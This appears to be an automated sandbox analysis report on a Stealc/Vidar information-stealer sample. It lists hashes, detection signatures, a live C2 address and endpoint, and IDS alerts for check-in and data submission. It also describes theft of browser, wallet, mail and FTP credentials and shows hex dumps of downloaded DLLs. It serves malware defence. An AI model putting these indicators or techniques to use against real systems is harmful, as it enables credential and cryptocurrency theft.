Windows Analysis Report
4c469e2cf403fea6249e835ddce23de2.exe

Overview

General Information

Sample name: 4c469e2cf403fea6249e835ddce23de2.exe
Analysis ID: 1523165
MD5: 3988d57be5af6fb461fec4bbd0f747f3
SHA1: c4ea1473edc170309eb4f0d3b8f753e390ac1553
SHA256: 869deec09d4b035c500fb282df367e622f3e75e39fef3f6cd674fb1d1dca7b09
Tags: exeStealcuser-abuse_ch
Infos:

Detection

Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Found many strings related to Crypto-Wallets (likely being stolen)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Name Description Attribution Blogpost URLs Link
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Name Description Attribution Blogpost URLs Link
Vidar Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection
barindex
Multi AV Scanner detection for domain / URL
Source: http://45.200.148.113/0a616124ff2f2b69.phpO Virustotal: Detection: 13% Perma Link
Multi AV Scanner detection for submitted file
Source: 4c469e2cf403fea6249e835ddce23de2.exe ReversingLabs: Detection: 13%
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7FA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 0_2_6C7FA9A0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7F4440 PK11_PrivDecrypt, 0_2_6C7F4440
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7C4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 0_2_6C7C4420
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7F44C0 PK11_PubEncrypt, 0_2_6C7F44C0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C8425B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 0_2_6C8425B0
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7D8670 PK11_ExportEncryptedPrivKeyInfo, 0_2_6C7D8670
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7FA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 0_2_6C7FA650
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe Code function: 0_2_6C7DE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 0_2_6C7DE6E0
Uses 32bit PE files
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 4c469e2cf403fea6249e835ddce23de2.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: mozglue.pdbP source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@_\9] source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: z:\build-dev\usbnet5.Mon_05_17_2021_16_10_12.10\projects\usbnet5\src\virt\shell\Release\usbclient.pdb0@ source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1937425066.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp, 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000000.1696785302.0000000000B4E000.00000002.00000001.01000000.00000003.sdmp
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962304971.000000006C8CF000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: 4c469e2cf403fea6249e835ddce23de2.exe, 00000000.00000002.1962494191.000000006F8DD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\4c469e2cf403fea6249e835ddce23de2.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 45.200.148.113:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 45.200.148.113:80 -> 192.168.2.4:49732
Source: Network traffic Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Source: Network traffic Suricata IDS: 2044249 - Severity 1 - ET MALWARE Win32/Stealc Submitting Screenshot to C2 : 192.168.2.4:49732 -> 45.200.148.113:80
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:10 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:14 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "a7550-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:15 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "94750-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:15 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "6dde8-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 01 Oct 2024 05:51:16 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 